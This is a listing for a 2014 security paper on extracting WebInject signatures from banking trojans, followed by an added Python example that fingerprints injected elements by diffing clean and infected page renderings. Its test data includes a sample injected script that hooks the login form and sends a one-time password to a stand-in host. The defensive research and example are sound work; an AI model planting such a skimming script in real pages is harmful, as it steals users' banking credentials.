ZARATHUSTRA: Extracting WebInject Signatures from Banking Trojans
Venue
Twelfth Annual International Conference on Privacy, Security and Trust, IEEE (2014), pp. 139-148
Publication Year
2014
Authors
Claudio Criscione, Fabio Bosatelli, Stefano Zanero, Federico Maggi
Abstract
Modern trojans are equipped with a functionality, called WebInject, that can be
used to silently modify a web page on the infected end host. Given its flexibility,
WebInject-based malware is becoming a popular information-stealing mechanism. In
addition, the structured and well-organized malware-as-a-service model makes
revenue out of customization kits, which in turn leads to high volumes of binary
variants. Analysis approaches based on memory carving to extract the decrypted
webinject.txt and config.bin files at runtime make the strong assumption that the
malware will never change the way such files are handled internally, and therefore
are not future proof by design. In addition, developers of sensitive web
applications (e.g., online banking) have no tools that they can use to even
mitigate the effect of WebInjects. WebInject-based trojans insert client-side
code (e.g., HTML, JavaScript) while the targeted web pages (e.g., online banking
website, search engine) are rendered in the browser. This additional code
captures sensitive information entered by the victim (e.g., one-time passwords) or
performs other nefarious actions (e.g., click fraud or search engine result
poisoning). The visible effect of a WebInject is that a web page rendered on
infected clients differs from the very same page rendered on clean machines. We
leverage this key observation and propose an approach to automatically characterize
the WebInject behavior. Ultimately, our system can be applied to analyze a sample
automatically against a set of target websites, without requiring any manual
action, or to generate fingerprints that are useful to determine whether a client
is infected. Unlike the state of the art, our method works regardless of
how the WebInject module is implemented and requires no reverse engineering. We
implemented and evaluated our approach against live online websites and a dataset
of distinct variants of WebInject-based financial trojans. The results show that
our approach correctly recognizes known variants of WebInject-based malware with
negligible false positives. Throughout the paper, we describe use cases that
show how our method can be applied in practice.
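
The key observation above (an infected rendering differs from a clean one only by what the trojan injected) can be turned into a DOM-diff fingerprinting routine. The following is an added illustration written for this page; it is not ZARATHUSTRA's implementation and the paper's own pipeline is not described here. The sample login page, the CSRF token values, the timestamps and the injected one-time-password field and exfiltration script are all constructed for the example. The refinement of rendering the clean page several times and discarding slots that vary between clean renderings (tokens, timestamps) is an assumption of this example, added because without it every dynamic page would produce false "injections".

```python
"""Toy WebInject fingerprinting by DOM diff (added example, not ZARATHUSTRA's code).

Flatten each rendering into a multiset of element signatures, subtract every
signature seen in any clean rendering, drop the slots that differ between clean
renderings anyway (CSRF tokens, timestamps), and keep the remainder as the
injection fingerprint.  A real deployment would feed the DOM serialised by a
browser, since WebInjects modify the rendered page, not the bytes on the wire.
"""
from collections import Counter
from html.parser import HTMLParser

# Elements that never have a closing tag; html.parser does not close them for us.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "param", "source", "track", "wbr"}


class DomFlattener(HTMLParser):
    """Collect one record per element: structural path, tag, attributes, text."""

    def __init__(self):
        super().__init__()
        self.stack = []   # currently open elements
        self.nodes = []   # every element seen, in document order

    def handle_starttag(self, tag, attrs):
        path = "/".join([n["tag"] for n in self.stack] + [tag])
        node = {"path": path, "tag": tag,
                "attrs": tuple(sorted((k, v or "") for k, v in attrs)),
                "text": []}
        self.nodes.append(node)
        if tag not in VOID:
            self.stack.append(node)

    def handle_endtag(self, tag):
        if tag in VOID:
            return
        while self.stack:                      # tolerate sloppy nesting
            if self.stack.pop()["tag"] == tag:
                break

    def handle_data(self, data):
        text = " ".join(data.split())          # collapse whitespace; <script> bodies arrive here too
        if text and self.stack:
            self.stack[-1]["text"].append(text)


def signatures(html):
    """Multiset of (path, tag, attrs, text) for every element of one rendering."""
    parser = DomFlattener()
    parser.feed(html)
    parser.close()
    return Counter((n["path"], n["tag"], n["attrs"], " ".join(n["text"])) for n in parser.nodes)


def shape(sig):
    """Position-independent identity of an element: path, tag and attribute names."""
    path, tag, attrs, _ = sig
    return (path, tag, tuple(k for k, _ in attrs))


def volatile_shapes(clean_renderings):
    """Shapes whose attribute values or text differ from one clean rendering to the next."""
    per_rendering = []
    for sigs in clean_renderings:
        by_shape = {}
        for sig in sigs:
            by_shape.setdefault(shape(sig), set()).add((sig[2], sig[3]))
        per_rendering.append(by_shape)
    all_shapes = set().union(*(d.keys() for d in per_rendering))
    return {s for s in all_shapes
            if len({frozenset(d.get(s, ())) for d in per_rendering}) > 1}


def extract_fingerprint(clean_htmls, suspect_html):
    """Elements present in the suspect rendering but in no clean one, minus volatile slots."""
    clean = [signatures(h) for h in clean_htmls]
    known = Counter()
    for sigs in clean:
        known = known | sigs                   # union keeps the max count per signature
    noise = volatile_shapes(clean)
    extra = signatures(suspect_html) - known   # only positive counts survive
    return sorted(sig for sig in extra if shape(sig) not in noise)


def is_infected(fingerprint, html, min_hits=1):
    """Client-side check: does this rendering contain the fingerprinted injections?"""
    sigs = signatures(html)
    return sum(1 for sig in fingerprint if sig in sigs) >= min_hits


def render(csrf, stamp, inject_form="", inject_body=""):
    """Constructed sample page; the inject_* slots stand in for what a WebInject adds."""
    return f"""<html><body>
<form id="login" action="/login" method="post">
<label>User</label><input name="user">
<label>Password</label><input name="pass" type="password">{inject_form}
<input type="hidden" name="csrf" value="{csrf}">
<button type="submit">Sign in</button>
</form>
<div id="footer">Rendered {stamp}</div>{inject_body}
</body></html>"""


# Constructed data: two clean renderings (token and timestamp change), one infected one.
CLEAN_RENDERINGS = [render("a1b2c3", "2014-01-01 10:00:00"),
                    render("d4e5f6", "2014-01-01 10:05:00")]
INJECT_FORM = '<label>One-time password</label><input name="otp">'
INJECT_BODY = ('<script>document.getElementById("login").onsubmit=function(){'
               'new Image().src="http://c2.invalid/?"+this.otp.value};</script>')
INFECTED = render("9f8e7d", "2014-01-01 10:07:00", INJECT_FORM, INJECT_BODY)


if __name__ == "__main__":
    for sig in extract_fingerprint(CLEAN_RENDERINGS, INFECTED):
        print(sig)
```

Two caveats a practitioner should keep in mind. The volatility filter hides any injection that lands in a slot which legitimately varies between clean renderings, so the clean baseline should be rendered in a trusted environment and kept small and recent. And because the fingerprint is keyed on the page's structure, it must be regenerated whenever the target site changes its markup, otherwise the benign change is reported as an injection.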
